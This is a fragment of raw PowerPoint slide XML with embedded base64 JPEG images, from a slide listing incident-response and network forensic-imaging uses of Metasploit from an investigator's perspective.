txSNPxTL/Rmo7x+w6S+isdJR0lX3B+huU/pcTGvciM582y1YtneifCR2MnSTH9t8q/9KW+JNK+WKHXDNmRwRs7BUVmY8FVSzHwA1q4bE9GOJmsZrQJ2HrSHwQGw95HhWrYDZMUC5YY0jXsRQt/G3H306AqMuZvReP46WyD2Dufh8ILxpd+cj9aQ+B4KO4WqcAr2iott7OhJLQUUUVhoUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQB5XtFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAf/Z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49494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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perspectives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41842" y="1219200"/>
            <a:ext cx="8181974" cy="5029200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Investigator Perspective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Incident Response with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	2. Forensic imaging of hard drive over network via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…COMPARE…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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